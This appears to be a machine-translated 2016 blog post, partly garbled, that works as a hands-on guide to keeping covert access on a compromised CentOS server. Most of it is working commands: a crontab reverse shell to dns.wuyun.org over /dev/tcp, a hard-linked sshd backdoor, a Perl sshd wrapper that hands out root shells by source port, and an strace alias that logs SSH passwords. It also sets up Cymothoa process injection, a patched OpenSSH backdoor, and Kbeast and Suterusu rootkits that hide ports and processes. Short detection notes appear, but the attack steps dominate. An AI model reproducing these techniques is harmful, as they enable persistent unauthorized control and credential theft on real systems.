L3m0n 2016/05/16 10:23

0 x00 preface

Before a period of time to learn a small part of the network of small notes, zone.wooyun.org/content/264…

The result did not expect to seem to be more popular, is also the first time to be struck by thunder. Recently, I met rookit planting in the competition, so I felt helpless, so I studied it, the content is some previous technology, but also for the following notes to add another chapter (under Windows domain permission maintenance can see more three good student master’s article). The bull floats by.

Note address: github.com/l3m0n/pente…

Test environment :centos 6.5

0x01 crontab

Plan tasks, love forever

Every 60 minutes the shell bounces back to port 53 of dns.wuyun.org

#! bash (crontab -l; printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53; exec 0<&9; exec 1>&9 2>&1; /bin/bash --noprofile -i; \rno crontab for `whoami`%100c\n")|crontab -Copy the code

0x02 Hard Link SSHD

Up the firewall pit… Let’s turn it off before testing

#! bash service iptables stopCopy the code

SSH: connect to host 192.168.206.142 port 2333: No route to host

#! bash ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333; ssh[email protected] -p 2333
Copy the code

Use root/bin/ FTP /mail as the user name and any password

Backdoor investigation:

#! bash netstat -anoptCopy the code

Find problematic processes

#! bash ps -ef | grep pid ls -al /tmp/su kill -9 pid rm -rf /tmp/suCopy the code

0x03 SSH Server wrapper

Condition: If SSH is enabled, there is no port process if you do not connect, and last can not see it

#! bash cd /usr/sbin mv sshd .. /bin echo '#! /usr/bin/perl' >sshd echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^.. 4A/); '>> SSHD echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @argv,' >> SSHD chmod u+x SSHD /etc/init.d/sshd restartCopy the code

Execution under Kali

#! Bash socat STDIO TCP4:192.168.206.142:22, sourceport = 13377Copy the code

For source port modifications:

#! python >>> import struct >>> buffer = struct.pack('>I6',19526) >>> print repr(buffer) '\x00\x00LF' >>> buffer = struct.pack('>I6',13377) >>> print buffer 4ACopy the code

Backdoor investigation:

#! Bash netstat -anopt // run the following command to check the SSHD process: ll /proc/1786 cat /usr/sbin/sshdCopy the code

Restore:

#! bash rm -rf /usr/sbin/sshd; mv /usr/bin/sshd .. /sbin;Copy the code

0x04 SSH keylogger

Vim. Bashrc file under the current user, added at the end

#! bash alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'Copy the code

Then make the configuration take effect

#! bash source .bashrcCopy the code

When a local SU or SSH is executed, it is logged under TMP.

0x05 Cymothoa_ Process injects Backdoor

The nice point is that the injected process, as long as it has permissions, then bounce back the corresponding permissions of the process (do not need root), of course, the process restarts or hangs. And of course the action is obvious.

Thread injection:

#! bash ./cymothoa -p 2270 -s 1 -y 7777Copy the code

#! bash nc -vv ip 7777Copy the code

0x06openssh_rookit

Download address: core.ipsecs.com/rootkit/pat…

The first patch

#! Bash wget http://mirror.corbina.net/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz tar ZXVF openssh - 5.9 - p1. Tar. Gz cp Sshbd5.1p1.diff Openssh-5.9 P1 / CD Openssh-5.9 P1 patch < sshBd5.9p1.diffCopy the code

Install dependencies

#! Bash yum install zlib-devel yum install openssl-devel yun install PAM -devel yun install krb5-libCopy the code

Modification includes. H

Compile, install, and restart the SSHD service

#! bash ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 make && make install && service sshd restartCopy the code

To use:

Log in and out of SSH account password (error will be recorded), the password set in the configuration file, can also log in through SSH and root.

Findings:

Find the suspicious SSHD and check the last login IP, and finally kill their process, clear temporarily unknown

0x07 Kbeast_rootkit

Core.ipsecs.com/rootkit/ker…

#! bash tar -zxvf ipsecs-kbeast-v1.tar.gz cd kbeast-v1/ vi config.hCopy the code

Important Configuration:

#! CPP #define _LOGFILE_ "acctlog" //rookit #define _H4X_PATH_ "/usr/_h4x_" #define _HIDE_PORT_ 23333 #define _HIDE_PORT_ 23333 #define _HIDE_PORT_ 23333 #define _HIDE_PORT_ 23333 #define _HIDE_PORT_ 23333 #define _HIDE_PORT_ 23333 #define _RPASSWORD_ "lolloltest" #define _MAGIC_NAME_ "root"Copy the code

To use:

1. Record:

2. Telnet connection

  • Disadvantages: Restart will be invalid, need to put in the boot item
  • Advantages: Compared to the above are SSH related or have a low permission maintenance to play a backdoor, this is directly open a separate port

Found: actually feel to modify the process name, found or a little trouble

0x08 Mafix + Suterusu rookit

1, Mafix

#! bash ./root lolloltest 23333Copy the code

This will result in SSH with port 23333,root password can also be logged in with Lolloltest, port not hidden

This is when you can use Suterusu

2, Suterusu

Menu:

#! bash Get root $ ./sock 0 Hide PID $ ./sock 1 [pid] Unhide PID $ ./sock 2 [pid] Hide TCPv4 port $ ./sock 3 [port] Unhide TCPv4 port $ ./sock 4 [port] Hide TCPv6 port $ ./sock 5 [port] Unhide TCPv6 port $ ./sock 6 [port] Hide UDPv4 port $ ./sock 7 [port] Unhide UDPv4 port $ ./sock 8 [port] Hide UDPv6 port $ ./sock 9 [port] Unhide UDPv6 port $ ./sock 10 [port] Hide file/directory $ ./sock 11 [name] Unhide file/directory $ ./sock 12 [name]Copy the code

Compile:

#! Bash make linux-x86 KDIR=/lib/modules/$(uname -r)/build GCC sock.c -o sockCopy the code

Used with Mafix (hidden ports):

#! bash ./sock 3 [port]Copy the code

0x09 Resources

  • www.aldeid.com/wiki/Cymoth…
  • Phrack.org/issues/68/9…
  • www.joychou.org/index.php/w…